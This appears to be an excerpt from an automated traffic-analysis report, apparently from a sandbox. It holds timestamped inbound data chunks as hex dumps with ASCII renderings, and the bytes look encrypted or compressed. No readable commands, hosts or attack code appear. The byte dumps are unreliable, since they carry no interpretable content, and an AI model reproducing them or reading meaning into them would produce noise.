70 17 2f e3 62 8d 95 6e 00 ac e3 1e 9f 3b 57 c6 86 9e 17 27 3f 02 74 c7 35 38 94 24 db 2b Data Ascii: s.[dUq;~EI(\|hP>#}37`;, ]&iXaWk%lH7O?f@<<}2`5c8\|^Hr+)zq9b2.u1y.P*<Utn%Kd2=cW\u&#JnKYz]p/bn;W'?t58$+
2022-10-03 14:13:31 UTC	83	IN	Data Raw: 40 11 15 f4 9b 28 16 de 80 d1 40 4f 8e 88 f3 6a d2 c9 84 67 15 f7 74 8a 9e 2e e1 55 32 0d 5a c8 0d 82 64 2b 6e ec 3b 48 03 db cf 25 6e c5 6c 1c 70 67 a1 72 f1 77 43 53 ab 4e 31 60 d2 49 17 14 28 08 44 10 36 40 43 22 cc 4d 88 d7 6c 62 11 13 3d ba 2c f5 c0 16 76 74 09 e0 8b a7 63 82 20 3e 32 82 64 92 92 9e b8 db 47 4f 17 72 2f 7e 0f 67 4a 34 3e e3 2d 24 5e a9 d9 6b 19 18 75 d6 ef 9a a9 1e 9c b3 e4 72 6e fa 62 cb 6a e5 70 30 7c 6c b3 f9 16 e5 e2 a5 50 6c 18 4b 7e b2 90 39 9d 3a e0 20 28 c8 91 52 5b 9b 46 e9 c6 92 e0 80 8d 33 67 02 1f 72 c1 0a 59 c7 53 20 c9 1f 5d 00 a0 7e cd 38 6f 81 23 68 ad 81 69 fe d5 78 26 e4 a7 33 44 c0 f4 15 b3 2d 9d ef c2 10 ae 44 f8 b8 6f 6e 44 b9 80 1d 31 9b 64 96 ce 62 95 b3 9d c3 cb 95 7b 9e c6 a6 4e 27 6b 21 9f f6 d8 b1 17 13 18 Data Ascii: @(@Ojgt.U2Zd+n;H%nlpgrwCSN1`I(D6@C"Mlb=,vtc >2dGOr/~gJ4>-$^kurnbjp0\|lPlK~9: (R[F3grYS ]~8o#hix&3D-DonD1db{N'k!
2022-10-03 14:13:31 UTC	84	IN	Data Raw: d0 4b ab 88 75 aa 02 c9 bf cd 91 16 05 50 b3 19 d5 3c 75 c7 b4 3a ca 64 87 87 2c 9f ef ba 73 3c 4c 43 fa a2 a3 9d a3 dd 8e c5 4d ce 06 7f 28 ec b1 3b dc a7 5b bd ab 44 bb 35 16 f9 92 29 ac 59 83 64 36 eb 5d 7b b9 90 13 5c fd 5f 41 3b 72 73 97 84 fe 1b b8 e9 97 1d 46 e1 04 06 a4 00 5c e6 37 03 6c 3b 84 f5 2c c6 20 9d dd aa 5d 26 ee 69 d4 bb 95 8f 58 61 97 10 9b 57 1d 6b 11 d2 61 3e 1e e5 82 aa 1c 3b 4e 68 2f c4 19 b8 e0 e9 9e f3 d7 32 30 96 06 ce 8a 6f 39 80 7b e8 ac d0 eb 0b 1f ad 38 c1 ef ff d9 f5 bd 76 c6 48 ed a8 74 a8 58 19 bd 74 97 95 e8 45 45 76 16 dd 05 21 52 06 00 2f 78 21 28 a3 39 0d 08 59 3f 68 bd c8 90 c6 86 39 51 a1 b2 9c 2a 15 ad a0 cf 88 43 eb 28 3d 91 4e cf dd 98 cc 68 6f 9f 83 3d b0 5c f5 0c 76 3b 9b e4 a4 a9 15 af 76 b2 85 66 47 8c 3f 5d Data Ascii: KuP<u:d,s<LCM(;[D5)Yd6]{\_A;rsF\7l;, ]&iXaWka>;Nh/20o9{8vHtXtEEv!R/x!(9Y?h9Q*C(=Nho=\v;vfG?]
2022-10-03 14:13:31 UTC	85	IN	Data Raw: b4 7b 11 a9 1c c2 4f 8c f4 64 4e 88 cc 29 b0 03 25 ec 96 15 83 39 df 23 1a e3 8e 31 70 ec 2b 0e f7 14 a9 b0 ab da 8f 53 9d 4b af 64 b3 ba d8 a2 68 67 3d b9 4b 40 0a 27 f0 9b 29 58 de 80 1a 42 4d 9f fb b8 6a d2 c3 81 78 0f df ac 8a 9e 24 c9 17 36 0d 13 e0 3e 82 76 23 64 ea 72 75 03 db c9 1c b2 c5 49 1c 03 9e bb 42 f4 7a 43 54 83 a2 f3 60 d8 70 d6 0f 2a 0e 21 e0 1f 71 47 2b a5 26 a8 d7 66 07 7d 0c 39 b0 39 db cb 81 76 7e 1a f7 9c 8a 0e bf 20 34 2b ab 7e e5 a0 a1 bc d1 4a fd db 70 2f 74 0f 66 77 5f 46 e3 2b 34 7b 91 f1 75 17 0e 8d ff e6 60 a8 47 98 97 97 4f 69 e9 60 d1 47 eb 71 18 33 46 93 fb 79 a0 cb df 56 7d 1b 51 69 bf d7 5e 9b 3a ec 20 37 c8 91 52 1c 33 47 e9 ca ee d7 88 a5 15 72 07 10 4b e4 61 1f c3 7b 50 e1 85 58 13 a1 18 37 1a 6b 8b 0d f0 b2 85 6f 97 Data Ascii: {OdN)%9#1p+SKdhg=K@')XBMjx$6>v#druIBzCT`p*!qG+&f}99v~ 4+~Jp/tfw_F+4{u`GOi`Gq3FyV}Qi^: 7R3GrKa{PX7ko
2022-10-03 14:13:31 UTC	87	IN	Data Raw: e8 ee 19 3a 1a 9c 16 7e b4 2e 24 b3 e2 1f 30 64 69 05 b1 6b 3c b6 d7 9c 8f 50 51 21 c5 20 4a 13 67 19 2b 70 35 52 b5 b3 f4 96 6d c5 2d 39 1d 64 05 a0 63 64 e3 d5 d0 1c 80 63 e0 70 cb be dc 87 16 76 cd b5 19 df e2 71 d6 a1 18 44 71 a2 a9 32 ce eb b0 66 13 2e 4b d2 9f d0 87 ab 03 84 c9 19 86 06 7f 23 d4 e3 3f dc a1 34 86 e7 0a b1 28 3b c0 3a 2c b7 69 8f 0b f8 e8 5d 71 62 be 05 5e a3 7d ce 3f 78 79 ae 56 ee 36 24 f7 9b 3c d5 db 06 00 a5 3b a4 f6 33 3c 03 17 e6 f7 3d c4 20 f6 d9 aa 51 61 e7 6f d4 b7 95 16 58 61 97 2b ad 46 19 49 d0 66 60 38 71 f0 e2 a8 16 15 cc 4a 2f ce 00 9a fc c5 9c f5 f5 6e 19 94 0c ec f5 66 28 82 7c c5 c8 c2 ee 83 be 37 e5 d2 ff ed cb d9 c5 5f 5a 48 fc a7 4d bf c2 31 82 63 91 82 c8 62 6d 05 1f f5 3c 37 df 0b 39 62 78 35 3c a6 14 80 0e c3 Data Ascii: :~.$0dik<PQ! Jg+p5Rm-9dcdcpvqDq2f.K#?4(;:,i]qb^}?xyV6$<;3<= QaoXa+FIf`8qJ/nf(\|7_ZHM1cbm<79bx5<
2022-10-03 14:13:31 UTC	88	IN	Data Raw: 2d 06 88 fa 93 bc b8 b9 15 7b 45 50 b6 3a 61 b2 06 dd 44 e8 1f 25 a5 8d ab 77 28 a4 18 61 06 a0 6f 6f d8 44 f8 2d 83 eb 00 20 78 3c ce 5a 94 b8 8b 54 13 64 7b af 06 70 a9 1c 2f 93 84 df 62 64 88 cc d3 b0 2b 25 61 94 15 8f be f9 0d 1a f8 ab 31 70 c8 2b 0e 4f 16 11 c1 aa 9c aa 53 9d 26 a9 64 24 0c 28 29 69 65 3d b9 4b 40 11 17 f4 9b 28 59 de 95 d1 42 4d 4e 8c a2 68 07 cd 8a 67 00 f7 74 8a bb 2e e1 54 29 3d 1c c8 bf 85 76 29 a0 ec 5a 5b 70 c1 c1 25 64 cf 61 18 70 66 bc 2d cc 75 4a 58 83 18 f6 60 d4 70 33 0a 2a 0e 5a 75 21 73 41 28 e2 74 aa d7 66 7b 31 1f 31 92 80 dd f3 1c 5e 0c 1b e5 90 b1 4d 95 24 3e 38 a9 00 df 8a 9c b2 f9 14 96 c0 74 07 27 1a 62 59 08 2d dc 2f 22 59 88 e0 75 1d 12 60 f9 e1 99 81 b2 b4 c9 ee 5a 1a e8 66 c8 51 ff 62 bd 62 44 93 fc 1b f5 47 Data Ascii: -{EP:aD%w(aooD- x<ZTd{p/bd+%a1p+OS&d$()ie=K@(YBMNhgt.T)=v)Z[p%dapf-uJX`p3*Zu!sA(tf{11^M$>8t'bY-/"Yu`ZfQbbDG
2022-10-03 14:13:31 UTC	89	IN	Data Raw: fb 3a 1b 04 86 02 89 ee 47 b4 56 96 ed 4c 3e 40 cf fb 41 49 0d e7 95 9e 2e d2 90 1e c2 85 d1 f5 3e c1 96 a5 55 41 23 62 2b 68 9c a3 13 9e 94 5a c1 d7 66 87 b7 ef ee 0e 38 09 bf 0b 5d a2 3f 16 3f 60 1e 32 65 cb 14 07 7f 14 f3 58 9e 85 4f 0d ae 47 20 46 12 71 31 51 72 35 58 8f ef 0b 69 94 d2 3e 2a 41 70 16 b6 08 e2 e1 d5 c5 0d 8f 4b f8 74 cb b9 a8 79 1e 76 29 9c 08 ce 20 59 e9 b4 30 12 1a 6c af 1a 95 d6 74 60 3b 58 58 c4 8a aa 4b ba 1b 9f d7 71 fd 57 6e 3f e4 67 28 c4 8c 12 ac f5 19 9c 35 14 e8 b5 47 89 68 87 62 d5 e4 4a f6 76 90 13 4c 9d 67 52 19 6e 68 a7 f4 7d 1b be fb 31 24 98 f4 2c 45 ae 28 aa cf 97 05 60 19 ce 8c 2e c0 02 97 80 a8 57 04 f2 5e d4 bd b7 d3 67 60 9d 3e b7 4f 0a b7 3b 7d 71 30 09 40 e7 a8 1c 3c 75 6c 3e e2 05 81 cc 61 1c f5 ff 00 92 87 2a Data Ascii: :GVL>@AI.>UA#b+hZf8]??`2eXOG Fq1Qr5Xi>ApKtyv) Y0lt`;XXKqWn?g(5GhbJvLgRnh}1$,E(`.W^g`>O;}q0@<ul>a
2022-10-03 14:13:31 UTC	90	IN	Data Raw: 24 ef f7 31 13 d8 77 c2 0a 27 86 de 8e f1 a7 46 44 9e f8 fa 69 01 01 79 be 36 33 de ac 38 a9 27 a2 a3 e5 69 a0 46 56 cc 2e 80 9f 47 22 16 56 a4 0f 92 a6 bc ae 03 1d 69 07 6c 68 a7 b4 c1 4c 45 56 af 2d 65 3d 1d df 42 ee 67 f5 93 8d ad 76 de c4 1c 4b 07 a2 4d 6f 99 2a d0 46 87 eb 06 08 16 3f ce 50 a2 87 8b 54 62 4b 67 a8 3c 12 ab 1c ce bb a6 de 62 6e a0 a7 2d b1 2d 0d df 96 15 85 56 04 0c 1a f1 80 37 03 f7 29 0e 44 3e 16 ae e9 d4 aa 59 f2 0e af 64 2e a9 24 11 29 68 3d b9 59 48 39 52 f6 9b 22 4a db f3 ec 43 4d 88 9b a4 6f c3 cc e5 21 17 f7 7e e5 8d 2c e1 5f 5d 19 17 c8 07 91 7f 11 89 ec 5a 4a 11 d2 eb 30 6c c5 43 0f 77 77 bd 6a bb 73 4a 54 bd 66 c3 60 d2 52 72 3d 31 19 48 1d 0f 74 2e 64 c8 65 a0 c6 6b 07 eb 0f 39 b0 45 e2 f2 16 70 46 a9 e5 9a a2 5a ba 08 52 Data Ascii: $1w'FDiy638'iFV.G"VilhLEV-e=BgvKMo*F?PTbKg<bn--V7)D>Yd.$)h=YH9R"JCMo!~,_]ZJ0lCwwjsJTf`Rr=1Ht.dek9EpFZR
2022-10-03 14:13:31 UTC	92	IN	Data Raw: 01 21 5e 6c e7 2c b3 8e f7 8d b1 93 8a 8f c8 c5 31 6a 86 2b 5c 2f 14 c7 52 5e d5 f8 3f f5 04 d2 e5 0f 15 77 54 10 2b b6 68 d3 14 f0 3a a3 80 fb 40 de 79 53 f6 ea 5e b0 15 91 19 e8 87 c8 b3 5c 9f c4 21 1c 51 ef c5 2f 5a 81 63 bd bc 2f 70 8b 10 52 a9 94 f2 16 f8 89 85 d3 eb a2 66 2a 78 c7 24 11 9e 94 19 90 c4 68 9a 33 c0 90 0a 39 1c b4 65 7a b4 28 29 91 e2 1e 38 4c ed 01 24 6d 14 85 59 9e 85 78 f0 26 c5 26 35 6e 65 19 21 1f 4b 50 b5 b9 e2 9f 04 ba 2f 39 5a 70 df b3 23 74 e9 ed 5c 1d 80 63 cc 61 c1 d0 46 b5 1e 7c 58 33 1b df 25 59 e9 b0 30 1e 4c de ae 1a 9f e6 a1 6a 54 d9 4b d2 9f d8 1e ab 03 84 eb ac cd 06 79 01 cf b1 3b d6 b4 57 b4 f4 00 d4 a5 31 f9 98 53 35 6b 87 6e ec a3 5f 7b 7b 83 18 5c 85 56 56 2d 6b 6d 87 40 fe 1b be eb 86 24 ae 7a 17 0d be 25 b1 eb Data Ascii: !^l,1j+\/R^?wT+h:@yS^\!Q/Zc/pRf*x$h39ez()8L$mYx&&5ne!KP/9Zp#t\caF\|X3%Y0LjTKy;W1S5kn_{{\VV-km@$z%
2022-10-03 14:13:31 UTC	93	IN	Data Raw: cd 50 b7 81 d0 79 1a 19 fa a5 aa 82 b2 c7 14 be 08 93 79 53 4f 9a 35 d2 02 7e 4a 04 de b9 c6 aa b8 34 48 c1 b5 45 64 3d 3d 9e 6f c3 02 01 b4 eb d1 f5 db 0f d6 31 f2 f8 24 28 6c 51 cd 15 3d 47 af 1b ca e9 45 55 be 26 fa 69 01 cf 68 b1 29 6e c0 d2 a4 19 29 bd b0 ef 32 3c 57 7c d3 3a 9e e6 eb 30 19 8f b0 10 aa ea ad a1 0d 78 53 d0 6c 62 ad 00 2c 42 5a 47 9c d2 4d c1 1c 43 55 ed 0b 15 b2 56 ab 7d f6 3a 0f 44 1e 93 70 0b 05 31 f7 32 99 cb a6 20 25 3f 52 4b 85 a7 90 4b 23 fb 6a a0 0b 6c 89 cf c8 93 84 42 73 6b 97 d1 36 eb b7 34 e3 89 0b 94 a5 ec 02 05 e8 b4 62 ec fc 24 03 51 04 9c f0 aa d6 ab 40 92 5b a2 72 04 22 2c 29 69 f5 2c b6 5c 5f 1e 8b e5 94 30 46 b6 1c c0 4d 54 ae 46 a2 68 d2 55 9b 68 0f e8 03 16 8f 21 fa 4a 71 91 04 c7 11 9d 3a b5 7f e3 47 55 44 47 d2 Data Ascii: PyySO5~J4HEd==o1$(lQ=GEU&ih)n)2<W\|:0xSlb,BZGMCUV}:Dp12 %?RKK#jlBsk64b$Q@[r",)i,\_0FMTFhUh!Jq:GUDG
2022-10-03 14:13:31 UTC	94	IN	Data Raw: 1b a7 15 5c e2 dc e8 ae 2d 9b f9 ea 92 af 4e 4f af 55 07 37 84 80 1d 37 8d 6f 0b 56 71 9e f9 de c2 ca 88 5a 9e d7 5f 20 18 6a f7 99 e7 c0 d3 0a 39 61 fe c2 a3 19 09 80 44 d4 26 b9 82 f7 99 b1 93 8a d4 96 c7 31 6a 9a d3 5c 2f 14 c3 73 4f 56 fa 39 d7 aa da cd 9f 39 55 52 38 a9 9c ec dd 13 dc 1b b8 17 ff 4a f0 94 de f4 ec 27 de 1b 87 00 8c c1 56 b2 56 96 fd 53 09 5a 73 fe 54 4f 85 0a 1f 9c 2f 7a 92 36 c0 be 99 cc 4d ca 89 85 c8 cd 32 6f b0 6d b2 48 15 f1 83 74 ee cc 40 08 3e e8 e8 26 1a 1a 9c 10 6d b1 3f 04 9b dd 1e 32 6e 50 42 25 6b 3c c5 39 9c 8f 5a 61 25 d4 27 52 3b fe 1d 2b 76 22 df b2 b3 f4 97 78 ca 3c 36 46 76 00 02 21 68 f0 c5 d4 0c 94 77 d2 fd 98 bf c7 b6 0d 67 32 a0 0f c8 b3 60 c7 a7 18 b6 75 a2 a5 3c 8e fe a6 f0 17 47 58 c2 83 39 b5 b8 03 8e c9 b7 Data Ascii: \-NOU77oVqZ_ j9aD&1j\/sOV99UR8J'VVSZsTO/z6M2omHt@>&m?2nPB%k<9Za%'R;+v"x<6Fv!hwg2`u<GX9
2022-10-03 14:13:31 UTC	95	IN	Data Raw: c2 85 fc a3 2a 40 93 c9 d4 28 15 b6 a1 d6 8f ca ff 35 24 86 4d d5 a1 b2 f6 75 64 8c 89 38 b1 46 ec 9f 74 3e a2 de cb a2 1e b9 5c bc bb 67 46 9e 34 64 84 27 25 d4 4a a1 fe 4d 69 15 06 7d b4 58 82 b3 d4 85 8f 06 8d 72 4c f5 37 24 dd 1c 61 6d 80 d5 91 30 35 a9 3d 41 da 86 87 76 2e 2c 0f 5e cc 1c 0f 94 37 c5 e7 cf bb 30 3f ed f1 28 17 e1 4b ea a0 29 58 d8 91 cd f5 4e 56 8a e9 fd 49 01 52 79 be 25 6f cd bf 10 ff 27 a2 a5 e3 60 d3 7b 72 cc 28 92 8c 66 29 07 9c ca 4c 93 76 ba b8 01 6b 65 14 61 ec 1a 8b e7 5e 50 43 b2 02 59 d0 11 ce 4a 73 02 23 80 9c ae 6a 20 b5 1b 5a 0f 9d b9 7c 97 31 f6 3c 96 da e6 31 28 4b 4a 5a 8a b9 9a 51 7f bd 6c 79 99 41 a9 1c c9 bb 08 dc 62 6e fc c0 29 b1 30 36 e1 87 1d a7 03 fc 0d 10 e6 a6 5e bb ec 2b 04 21 2b 10 c1 ac c0 b9 56 89 59 ab Data Ascii: *@(5$Mud8Ft>\gF4d'%JMi}XrL7$am05=Av.,^70?(K)XNVIRy%o'`{r(f)Lvkea^PCYJs#j Z\|1<1(KJZQlyAbn)06^+!+VY
2022-10-03 14:13:31 UTC	97	IN	Data Raw: 0d 55 78 aa b5 07 95 c4 e7 24 0d da 82 5c 6c ec 55 e4 c0 90 e5 96 b9 ed 62 2e 0c 4b e7 26 09 c1 7b 50 e1 20 5b 13 ad 4e f9 e4 94 7e 3a 5d a0 88 69 e9 f0 1c d8 e5 8d 26 44 cf ca f6 91 05 43 f9 ea 2b 86 eb f6 ae 47 0a 04 84 81 17 95 97 64 94 ca 73 80 d1 c1 c9 35 92 46 90 df bd 28 07 66 32 94 e7 c0 ad 0f 2d 9f f5 e5 b0 1e ac 40 44 d4 2d a0 83 c0 1b a6 9e 8c ed b8 d8 24 9e e8 79 55 3e 15 df 70 ba c2 fe 26 cb 94 db e5 18 30 4c aa 11 0d 95 f4 5a 0c f6 12 91 93 fc 50 e5 f6 57 e7 e1 36 33 16 bd 1f 96 fe dd 9b f8 92 ec 59 ba 4d fa e0 50 4f 8c 7a 87 60 2e 5c 86 3f c5 a6 8b e7 2d c6 89 94 d4 dc 38 9c 2b 52 be 48 14 84 8f 70 4c d9 74 83 37 e8 ff 03 26 09 62 1b 52 b3 38 12 b9 fd 0a 21 69 69 14 29 74 33 48 58 b2 9f 41 76 0a f8 20 46 19 5e dc d5 8f ca 4d a5 a0 f9 96 7a Data Ascii: Ux$\lUb.K&{P [N~:]i&DC+Gds5F(f2-@D-$yU>p&0LZPW63YMPOz`.\?-8+RHpLt7&bR8!ii)t3HXAv F^Mz
2022-10-03 14:13:31 UTC	97	IN	Data Raw: 14 08 f9 88 20 59 cf 88 c7 bc 4c a2 8b b5 7b da c9 9b 6f 0a e4 8a 8b b2 2c ca 50 0a 63 eb 37 f2 8b 05 5a 6c ec 50 60 1d d9 eb 36 5e cc 49 18 75 66 ba 9f f2 77 5b 44 b8 5e ca 94 d6 58 64 0e 3b 18 51 0e e0 70 6d 33 cc 4d 24 d5 6c 62 b5 8c 39 ba 2b ce f6 09 63 6d 0a e5 8b b2 54 9f de 3f 14 a2 7e ee 91 0c 81 c2 4d 92 c0 6d 0c 6d 0e 62 4e 0c 59 1d 2c 0e 47 af f1 5d 33 1a 73 f4 ef 8e c3 ce 9c ca e5 72 62 e3 7a d1 52 fa 65 20 65 49 6d fc 3a ea f2 40 54 6c 1e 47 76 a8 a8 18 88 2a f9 1f f4 cd bd 5d 4b 6c 42 e9 c0 9e f0 9a b5 13 72 12 06 54 1e 0f 75 d0 7d 72 46 1d 5b 19 2b 9b e5 1b 6a 92 20 5f bc 96 79 f8 ec 12 39 fb 5f 3e 79 e5 ce e1 a3 23 8d 63 c2 30 ae 44 f8 7e c8 22 37 85 a9 09 37 88 67 af 64 73 91 d6 a7 4b cb 93 6b e6 5e ae 21 19 17 87 99 e7 d5 bf 30 28 71 f4 Data Ascii: YL{o,Pc7ZlP`6^Iufw[D^Xd;Qpm3M$lb9+cmT?~MmmbNY,G]3srbzRe eIm:@TlGv*]KlBrTu}rF[+j _y9_>y#c0D~"77gdsKk^!0(q
2022-10-03 14:13:31 UTC	99	IN	Data Raw: c9 05 93 73 c5 61 db a9 39 b6 32 75 34 a2 09 df 3e 61 c9 9b ce 15 59 a0 84 1f a7 e8 4b 9f c4 49 4c f8 8e 93 97 a9 4b 8f c3 67 10 06 7f 38 e3 a1 b6 ed a7 5b bc f6 0c aa 22 25 ef 0e 39 b1 7e 91 f8 d5 ec 45 6d ed 81 15 54 98 d9 52 3d 62 6f 23 69 f9 00 a8 66 82 33 a6 f6 98 11 a9 35 b6 7b 26 03 7e 05 7a e6 2a df 01 a9 41 bb 51 11 d0 7b 48 ac bb a3 53 77 01 29 a0 48 11 77 b4 74 66 21 13 db 7c b9 1a 22 68 5c b3 d5 15 8f db fb 02 e4 f9 0a 43 76 0d e6 ec 63 30 9d 07 30 bb c1 e4 8c bf d5 3e d3 ff e6 d6 ce d6 18 52 4a fc a7 69 86 97 31 88 7a 9f 87 e8 aa 47 76 1a ec b7 26 52 0c 38 71 7e 30 2f a4 3e be 1f c4 00 4b 35 4a 96 ee b4 9b 40 ac 82 d7 a6 a2 2b 31 c7 9e 51 4e 28 32 91 54 c8 c6 9d e0 6c e3 cc 83 2c a3 5e ed 87 6c 24 9d 71 da ab 03 b9 e0 b4 b2 7d 50 10 2e 45 59 Data Ascii: sa92u4>aYKILKg8["%9~EmTR=bo#if35{&~z*AQ{HSw)Hwtf!\|"h\Cvc00>RJi1zGv&R8q~0/>K5J@+1QN(2Tl,^l$q}P.EY
2022-10-03 14:13:31 UTC	100	IN	Data Raw: 14 70 a8 0f cd 8a 97 d4 62 75 82 d3 25 4f 2a 09 e0 9f 3d e3 38 fd 07 09 fe b4 3c 63 e7 2b 1f 44 02 ef c0 86 d5 bd 40 97 4a bc 6e 3b ac d2 28 45 6b 16 bc 73 6e ef e8 0b 9d 47 3b de 80 db 68 53 8c a0 b1 58 d1 c9 ac 66 15 f7 96 8a 9e 3f f7 46 35 35 17 c9 0d 82 76 38 69 f4 a4 4b 2f c3 eb 92 6a c5 4f 34 42 67 ba 48 da cf 4e 52 ad 66 c1 60 d2 52 6e 17 39 0f 4e 0b 19 68 bf 23 e6 6e ac d5 44 ce 38 0e 3f b1 30 ce f4 16 67 79 01 1b 9b 8e 41 ba 08 77 3a af 65 ec 94 8f bf d1 5d 95 df 7b d1 7f 32 69 4e 1a 53 e6 b7 31 57 bf fb 66 1a 18 62 f9 ef 94 57 19 98 dc f5 76 40 50 62 c2 44 95 6f 32 7a 4e aa 69 16 e3 ca c0 5b 7f 19 58 69 bc a2 e6 98 16 f0 0f 1e 32 90 42 8d e0 41 c1 ff 81 e8 83 fa 2a e5 02 19 5a fb 1d 5e c1 6a 5d d7 e1 5a 3f ae 4f 8e 1b 6b 81 3a 49 a0 82 69 e9 fa Data Ascii: pbu%O=8<c+D@Jn;(EksnG;hSXf?F55v8iK/jO4BgHNRf`Rn9Nh#nD8?0gyAw:e]{2iNS1WfbWv@PbDo2zNi[Xi2BAZ^j]Z?Ok:Ii
2022-10-03 14:13:31 UTC	101	IN	Data Raw: c6 a4 39 1a 96 10 a0 a6 06 37 b3 e2 14 1a 98 68 05 22 61 14 81 59 9e 85 8e 72 24 ef 20 46 52 7b 19 2b 70 35 52 b5 b3 f4 96 6b bf 2c 39 50 1d 04 a0 30 75 e3 d5 c5 39 80 63 c4 6b fb b8 c7 b1 1f 76 23 56 19 df 3e 73 dc b2 26 7b 83 a3 af 10 80 b0 83 68 39 4f 26 df 94 a3 97 a3 05 a6 69 67 ce 0c 57 da fd b1 31 d1 d4 82 bc e5 00 a8 22 22 ff 86 00 40 6b 87 62 d3 67 5a 7b 71 91 00 45 9f 4d 55 45 3f 78 bf 7c 5d 0a b6 ee 87 1d 4d e1 04 0a be 2e b4 cf cf 07 60 15 f1 7a 2b c0 08 be ce a2 46 06 cc 7a 58 7e bd bc 59 c3 8c 30 b2 43 35 96 29 65 6a 2f 18 d9 c8 51 1e 3d 60 5d a2 c3 13 90 d5 fe 96 e4 f7 17 4e de 0d e6 e2 cc 28 82 7c f9 92 36 ef 85 a2 ab e4 c6 d7 16 dd cd d7 60 4b 4f fc ad 64 bd ca 20 80 66 80 1f 04 76 45 77 be e4 32 35 46 24 ce 63 79 2b 39 b4 28 34 f5 c1 17 Data Ascii: 97h"aYr$ FR{+p5Rk,9P0u9ckv#V>s&{h9O&igW1""@kbgZ{qEMUE?x\|]M.`z+FzX~Y0C5)ej/Q=`]N(\|6`KOd fvEw25F$cy+9(4
2022-10-03 14:13:31 UTC	103	IN	Data Raw: 78 ef 14 6b 7d 85 bc bd 4d 45 50 20 38 4a de 35 ff c4 e2 14 0d 0e 9c ac 62 dc b0 82 5a 06 95 44 79 05 31 ff 32 af fd 9c 31 22 20 e3 7a 0a b8 8b 54 f4 76 7c b0 3a 50 56 1c c8 93 18 cf 65 7b a7 da b5 a0 2c 3a dc b6 95 8f 39 fd 91 0b f0 b4 00 66 71 3a 09 51 26 31 3e aa d6 aa cf 8c 4d b2 57 32 26 3d 2e 76 5d 1d 39 4b 40 11 8b e5 9c 37 6c fe 00 d1 42 4d 12 99 a5 77 e4 e9 0a 67 15 f7 e8 9b 99 31 d6 43 ae 1c 12 d7 35 9d 23 b5 7f eb 45 73 1c b5 5f 34 69 da 73 03 11 fa ab 45 ed 4c 55 30 37 5f f5 7f ee 47 08 92 3b 0f 51 27 01 14 dd 33 cd 7a 94 c8 4c f4 28 09 26 85 35 a9 6f 07 71 61 5a fa f5 3e 5a ba 3f 7f 27 8f f3 f0 8f 83 fa ce 3e 0e d1 75 30 3d 01 07 c3 0d 45 fc 69 3d 20 3c e0 72 02 5d 6c 91 6c 8f ae 07 f2 d6 88 ee 79 ee 79 85 5d 8c e8 21 7d 5b db e2 73 7f db d8 Data Ascii: xk}MEP 8J5bZDy121" zTv\|:PVe{,:9fq:Q&1>MW2&=.v]9K@7lBMwg1C5#Es_4isELU07_G;Q'3zL(&5oqaZ>Z?'>u0=Ei= <r]llyy]!}[s
2022-10-03 14:13:31 UTC	104	IN	Data Raw: af cd 17 90 00 8b f1 dc a2 5a 80 e4 d1 af 79 10 ed 50 54 89 73 84 92 27 fe 36 30 58 1a bc 0d 3e cb 83 91 d5 d2 2f 6e 3e 6d b8 50 9d 29 96 f8 59 f6 ac 99 b4 5f f9 d4 2e cc 11 98 7e b4 2f 12 b6 f5 17 bc d3 7e df 37 7a 2f bb 72 86 9e 55 63 2f d2 fa 4f 02 6a 8d 23 61 38 45 6f 27 95 08 7a c8 3a ef 43 6a 14 ad 21 76 d2 37 d4 19 0e d4 d2 aa dc 69 4a 35 1e 76 22 a2 1f c9 3e 74 58 07 28 ce 66 b0 bc 14 b4 bd a1 65 2a 56 dd c3 91 b2 93 3d d9 98 ec 7f df 00 6e 27 ed b4 2a d2 33 7b 42 e5 0a bb f2 22 fd 83 26 23 b3 19 4f d4 fb 5b 6a 7f 81 16 5c 80 d1 52 3f 69 77 2b a2 61 1d af fc 82 3b 2e c8 7f 02 af 22 88 ba 35 05 6a 3b d5 f7 2c ca 02 ae d3 bd 81 1d d4 7c da ac af 8d f0 bf 92 1d 8e 61 1d 61 22 76 6f 16 29 cd e0 a2 c2 3d 60 60 2f 85 0f 90 d4 ed 9e f5 ff 07 30 96 0c f6 Data Ascii: ZyPTs'60X>/n>mP)Y_.~/~7z/rUc/Oj#a8Eo'z:Cj!v7iJ5v">tX(feV=n'3{B"&#O[j\R?iw+a;."5j;,\|aa"vo)=``/0
2022-10-03 14:13:31 UTC	105	IN	Data Raw: 71 f0 2a 1a 61 46 14 2a 6c d9 de 87 03 c6 2b 75 9e f8 2c 63 07 7b e1 bf 36 76 c9 84 a2 0a 26 a8 a9 e1 6d b7 90 60 c8 3f 85 95 72 10 d7 4e b7 27 a4 76 bc a4 3a 92 72 05 6a 6f 85 ab 3d 4d 4f 8e b0 01 77 c0 1c d5 4c 8d df 0c 92 87 81 74 dc a6 1e 4b 00 9a 6f 6f 99 20 c8 2d ce 96 00 32 00 3f ce 5b 99 88 8d 54 47 65 7b af e6 70 a9 0d de 80 8c e6 77 66 88 cc 29 a0 23 38 12 97 39 86 28 fa 17 05 d4 37 2f 63 e5 2b 1f 46 0b 1f 3f ab fa ad 45 8e 4c b2 6b 37 b2 2c 38 61 76 2c 47 4a 6c 1d 06 f2 86 16 2e de 80 d1 5d 5f 9d 80 a2 79 da d0 74 66 39 fe 65 8d 88 31 f6 c9 28 1e 1d c8 1c 8a 61 d7 6f c0 59 52 10 d3 c3 34 66 da 40 e2 71 4a b0 53 f5 6b 55 0a 37 51 f8 73 da 58 75 06 35 18 b0 1b 32 7b 50 24 dd b3 b9 d1 73 79 2a 06 39 ab 22 c5 0d 17 5a 75 04 68 ab a2 4b bc 33 39 21 Data Ascii: qaFl+u,c{6v&m`?rN'v:rjo=MOwLtKoo -2?[TGe{pwf)#89(7/c+F?ELk7,8av,GJl.]_ytf9e1(aoYR4f@qJSkU7QsXu52{P$sy*9"ZuhK39!
2022-10-03 14:13:31 UTC	106	IN	Data Raw: 26 d6 f3 fa 0d a7 ae c3 01 b5 9a 9b 02 b4 eb 33 78 e4 55 57 39 e0 cf 56 22 c6 f5 39 d4 9b 28 e4 25 3f 7e 56 3b a2 99 c6 d7 14 e5 22 93 80 c0 4e f6 fb b2 f6 ec 3c ed 87 91 13 87 74 fb b3 56 97 e6 59 0e 4e f4 71 56 49 a1 c9 95 9e 2f ec 87 20 f6 05 94 f4 3e 57 8f 9c f9 3b 23 62 2a e2 b2 43 33 4d 9e 76 ee 5a 6e 8b 1a 50 ee 0e 39 86 9a 06 61 fc b2 07 ae fd 20 ae 62 77 1a 6c f7 3a a9 50 81 f2 cc 74 3d cf 3f 78 8f 61 06 20 6f 3f ce b3 ac f8 89 09 59 2b 26 5d 7a 99 a6 2f 69 c3 08 c5 1c 80 ff c3 6f c4 a0 e1 2b 18 69 33 91 ff df 2f 71 4a b6 2f 05 